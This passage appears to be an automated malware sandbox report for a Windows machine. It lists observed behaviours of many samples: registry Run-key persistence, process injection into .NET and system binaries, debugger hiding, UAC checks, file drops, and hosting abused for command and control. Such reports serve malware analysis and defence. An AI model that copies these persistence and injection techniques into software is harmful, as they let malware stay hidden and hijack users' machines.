Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\v7wa24td.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp = "\"C:\\Users\\Admin\\Desktop\\Files\\WindowsUI.exe\"" C:\Users\Admin\Desktop\Files\WindowsUI.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9758xBqgE1azKnB = "C:\\Users\\Admin\\AppData\\Roaming\\9758xBqgE1azKnB.exe" C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Desktop\a\x4lburt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" C:\Users\Admin\Desktop\Files\System.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\AppData\\Roaming\\OneDrive.exe" C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bwapp = "C:\\Users\\Admin\\Desktop\\Files\\bwapp.exe" C:\Users\Admin\Desktop\Files\bwapp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\2728A9395B252838420810\\2728A9395B252838420810.exe" C:\Users\Admin\Desktop\Files\Sniffthem.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\2728A9395B252838420810\\2728A9395B252838420810.exe" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe" C:\Users\Admin\Desktop\a\win.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Yjlwuuys = "C:\\Users\\Admin\\AppData\\Roaming\\Yjlwuuys.exe" C:\Users\Admin\Desktop\Files\Opdxdyeul.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\documents\\OneDrive.exe" C:\Users\Admin\Desktop\Files\OneDrive.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\2728A9395B252838420810\\2728A9395B252838420810.exe" C:\Windows\system32\audiodg.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Desktop\Files\Client_protected.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\arp.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\ARP.EXE N/A

Network Share Discovery

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\UAC C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SysWOW64\comctl32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\ws2_32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcrt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wrpcrt4.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\advapi32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\bcrypt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\msvcp_win.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\ncrypt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\combase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\dbghelp.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\DLL\iphlpapi.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\DLL\dbgcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\ntasn1.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\bcryptprimitives.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\wkernel32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\apphelp.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\wrpcrt4.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\shell32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wntdll.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\msvcp_win.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\combase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Roaming\LB31.exe N/A
File opened for modification C:\Windows\SysWOW64\DLL\wkernel32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\sechost.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\bcrypt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\ncrypt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\iphlpapi.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\ntasn1.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\wwin32u.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\ucrtbase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\bcrypt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\combase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\apphelp.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\comctl32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\ucrtbase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\wuser32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\advapi32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\sechost.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\ncrypt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\gdiplus.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\crypt32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\ole32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\dbghelp.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\Kernel.Appcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\MeshService.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\apphelp.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\crypt32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\wuser32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\shell32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\shcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\wntdll.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\wkernelbase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\comctl32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\msvcrt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\msvcrt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wuser32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\rh.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\L.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1432 set thread context of 3756 N/A C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe
PID 5328 set thread context of 5556 N/A C:\Users\Admin\Desktop\a\vg9qcBa.exe C:\Users\Admin\Desktop\a\vg9qcBa.exe
PID 1084 set thread context of 7024 N/A C:\Users\Admin\Desktop\Files\Armanivenntii_crypted_EASY.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
PID 6776 set thread context of 5648 N/A C:\Users\Admin\Desktop\Files\crypted8888.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 7132 set thread context of 6844 N/A C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
PID 5564 set thread context of 1788 N/A C:\Users\Admin\Desktop\Files\postbox.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 6512 set thread context of 6536 N/A C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
PID 6384 set thread context of 5744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 5688 set thread context of 6148 N/A C:\Users\Admin\Desktop\a\7mpPLxE.exe C:\Users\Admin\Desktop\a\7mpPLxE.exe
PID 5800 set thread context of 8148 N/A C:\Users\Admin\Desktop\Files\Opdxdyeul.exe C:\Users\Admin\Desktop\Files\Opdxdyeul.exe
PID 7188 set thread context of 7644 N/A C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
PID 7644 set thread context of 7360 N/A C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com C:\Windows\explorer.exe
PID 7616 set thread context of 7352 N/A C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
PID 6660 set thread context of 7080 N/A C:\Users\Admin\AppData\Roaming\LB31.exe C:\Windows\system32\dialer.exe
PID 7304 set thread context of 4384 N/A C:\ProgramData\Mig\Mig.exe C:\Windows\system32\dialer.exe
PID 7304 set thread context of 3716 N/A C:\ProgramData\Mig\Mig.exe C:\Windows\system32\dialer.exe
PID 7304 set thread context of 2968 N/A C:\ProgramData\Mig\Mig.exe C:\Windows\system32\dialer.exe
PID 5132 set thread context of 4104 N/A C:\ProgramData\euoxkxg\cqibun.exe C:\ProgramData\euoxkxg\cqibun.exe
PID 6128 set thread context of 2764 N/A C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe
PID 6624 set thread context of 1932 N/A C:\ProgramData\euoxkxg\cqibun.exe C:\ProgramData\euoxkxg\cqibun.exe
PID 1920 set thread context of 7540 N/A C:\ProgramData\euoxkxg\cqibun.exe C:\ProgramData\euoxkxg\cqibun.exe
PID 3152 set thread context of 9928 N/A C:\Users\Admin\Desktop\a\caspol.exe C:\Users\Admin\Desktop\a\caspol.exe
PID 7032 set thread context of 9288 N/A C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
PID 6028 set thread context of 10200 N/A C:\Users\Admin\Desktop\Files\whiteheroin.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 748 set thread context of 2556 N/A C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
PID 8124 set thread context of 3092 N/A C:\ProgramData\euoxkxg\cqibun.exe C:\ProgramData\euoxkxg\cqibun.exe
PID 9224 set thread context of 5600 N/A C:\Users\Admin\Desktop\Files\Sniffthem.exe C:\Windows\system32\svchost.exe
PID 9224 set thread context of 4896 N/A C:\Users\Admin\Desktop\Files\Sniffthem.exe C:\Windows\system32\audiodg.exe
PID 9224 set thread context of 7296 N/A C:\Users\Admin\Desktop\Files\Sniffthem.exe C:\Windows\system32\msiexec.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\d75b00c9-86a3-411f-9853-c2e352bce808.tmp C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
File created C:\Program Files (x86)\MountTaiSoftware\Lodop\NPCAOSOFT_WEB_PRINT_lodop.dll C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File created C:\Program Files (x86)\Mesh Agent\MeshAgent.msh C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241127004007.pma C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
File created C:\Program Files (x86)\MountTaiSoftware\Lodop\CAOSOFT_WEB_PRINT_lodop.ocx C:\Users\Admin\Desktop\Files\install_lodop32.exe N/A
File created C:\Program Files (x86)\Mesh Agent\MeshAgent.exe C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Tasks\UAC.job C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\PermitLite C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe N/A
File opened for modification C:\Windows\JennyArtistic C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe N/A
File opened for modification C:\Windows\TeddySecretariat C:\Users\Admin\Desktop\a\0fVlNye.exe N/A
File opened for modification C:\Windows\CentralAvoiding C:\Users\Admin\Desktop\a\0fVlNye.exe N/A
File opened for modification C:\Windows\OrganDiscretion C:\Users\Admin\Desktop\a\0fVlNye.exe N/A
File opened for modification C:\Windows\CameroonBuses C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe N/A
File opened for modification C:\Windows\VatBukkake C:\Users\Admin\Desktop\a\0fVlNye.exe N/A
File opened for modification C:\Windows\PossessDescriptions C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe N/A
File opened for modification C:\Windows\ConsolidationDistinct C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\system32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\system32\mspaint.exe N/A
File opened for modification C:\Windows\GeniusRepeat C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\XiMilton C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe N/A
File opened for modification C:\Windows\JoiningMazda C:\Users\Admin\Desktop\a\0fVlNye.exe N/A
File opened for modification C:\Windows\MozambiqueAppropriate C:\Users\Admin\Desktop\a\0fVlNye.exe N/A
File created C:\Windows\Tasks\UAC.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\TrainsSexcam C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe N/A
File opened for modification C:\Windows\GamingNat C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe N/A
File opened for modification C:\Windows\UruguayNorthern C:\Users\Admin\Desktop\a\0fVlNye.exe N/A
File opened for modification C:\Windows\IdeasApp C:\Users\Admin\Desktop\a\0fVlNye.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\Desktop\Files\Opdxdyeul.exe N/A
File opened for modification C:\Windows\PolyphonicWeblog C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe N/A
File opened for modification C:\Windows\DownReceptor C:\Users\Admin\Desktop\a\0fVlNye.exe N/A
File opened for modification C:\Windows\ComfortSick C:\Users\Admin\Desktop\a\0fVlNye.exe N/A
File opened for modification C:\Windows\BackedIma C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe N/A
File opened for modification C:\Windows\SgLaid C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe N/A
File opened for modification C:\Windows\MissWheat C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe N/A
File opened for modification C:\Windows\FlickrRealm C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe N/A
File opened for modification C:\Windows\FacingLone C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe N/A
File opened for modification C:\Windows\EditedRights C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe N/A
File opened for modification C:\Windows\KeyboardsTwin C:\Users\Admin\Desktop\a\0fVlNye.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Browser Information Discovery

discovery

Command and Scripting Interpreter: JavaScript

execution

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\System32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\System32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\System32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\System32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\System32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\System32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\a\7mpPLxE.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\Installeraus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\euoxkxg\cqibun.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\crypted8888.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\stail.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\fontdrvhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ARP.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
